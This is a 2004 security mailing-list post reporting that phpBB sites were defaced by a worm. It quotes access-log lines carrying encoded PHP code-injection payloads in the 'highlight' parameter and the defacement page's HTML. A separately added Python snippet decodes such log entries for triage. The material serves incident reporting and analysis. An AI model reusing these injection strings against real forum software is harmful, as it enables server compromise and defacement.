[unisog] php sites hacked...

Vijay S Sarvepalli VSSARVEP VSSARVEP at uncg.edu
Mon Dec 20 16:59:25 UTC 2004


HA!  looks like the phpBB hack allowed access to all WWW user associated 
files.  Wherever the user permissions
existed the files were overwritten such as *.html and *.php 

Vijay

voyager.site5.com - - [20/Dec/2004:09:18:54 -0500] "GET 
/viewtopic.php?t=2909&si
d=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Esystem(chr(112)%252echr(1
01)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%2
52echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252ec
hr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%
252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252e
chr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(3
2)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%
252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252ech
r(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(10
6)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252e
chr(34))%252e%2527 HTTP/1.0" 200 49196 
"http://helifreak.com/viewtopic.php?t=290
9&sid=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Esystem(chr(112)%252ec
hr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(3
2)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%2
52echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(
62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%
252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252ec
hr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(
32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%25
2echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252ech
r(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%
252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1)"
voyager.site5.com - - [20/Dec/2004:09:19:00 -0500] "GET 
/viewtopic.php?t=2909&si
d=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Efwrite(fopen(chr(109)%252
echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)
),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr
(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%25
2echr(32)),exit%252e%2527 HTTP/1.0" 200 11409 
"http://helifreak.com/viewtopic.ph
p?t=2909&sid=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Efwrite(fopen(c
hr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(1
02),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(1
14)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%2
52echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252e
chr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; 
Window
s NT 5.1)"





Vijay S Sarvepalli VSSARVEP <VSSARVEP at uncg.edu> 
Sent by: unisog-bounces at lists.sans.org
12/20/2004 10:06 AM
Please respond to: UNIversity Security Operations Group <unisog at lists.sans.org>
To: unisog at lists.sans.org
cc:
Subject: [unisog] php sites hacked...

All php sites in our one server have been hacked, defaced with 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<HTML><HEAD> 
<TITLE>This site is defaced!!!</TITLE> 
</HEAD><BODY bgcolor="#000000" text="#FF0000"> 
<H1>This site is defaced!!!</H1> 
<HR> 
<ADDRESS><b>NeverEverNoSanity WebWorm generation 9.</b></ADDRESS> 
</BODY></HTML> 
Do you guys know what vulnerability this is? 

Vijay
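
For triaging access logs like the entries quoted in this message, the following added example (not part of the original post or of phpBB) peels the layered percent-encoding off a `highlight=` value and expands the `chr(N).chr(M)` concatenation so the injected call is readable. The sample log lines, the `host.example` name and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample entries (not from the post), shaped like the log lines above.
SAMPLE_LOG = [
    'host.example - - [20/Dec/2004:09:18:54 -0500] "GET /viewtopic.php?t=1&highlight='
    '%2527%252Esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.0" 200 49196',
    'host.example - - [20/Dec/2004:09:20:11 -0500] "GET /viewtopic.php?t=1'
    '&highlight=rotor%20blade HTTP/1.0" 200 5120',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
CHR_RUN_RE = re.compile(r'chr\(\d+\)(?:\.chr\(\d+\))*', re.I)
CALL_RE = re.compile(r'\b(system|exec|passthru|shell_exec|popen|eval|fopen|fwrite)\s*\(', re.I)

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def expand_chr(text):
    """Replace each chr(N).chr(M)... run with the quoted string it builds."""
    def build(match):
        codes = re.findall(r'\d+', match.group(0))
        return repr(''.join(chr(int(c) % 256) for c in codes))
    return CHR_RUN_RE.sub(build, text)

def inspect_line(line):
    """Return a finding for a code-bearing highlight= value, else None."""
    request = REQUEST_RE.search(line)
    if not request:
        return None
    query = request.group(1).partition('?')[2]
    for pair in query.split('&'):
        name, _, raw = pair.partition('=')
        if name != 'highlight':
            continue
        text, rounds = fully_decode(raw)
        calls = sorted({c.lower() for c in CALL_RE.findall(text)})
        if calls or CHR_RUN_RE.search(text):
            return {'layers': rounds, 'calls': calls, 'decoded': expand_chr(text)}
    return None

if __name__ == '__main__':
    for entry in SAMPLE_LOG:
        print(inspect_line(entry))
```

Log lines that the mail client wrapped across several lines need to be rejoined into one line each before they are passed to `inspect_line`.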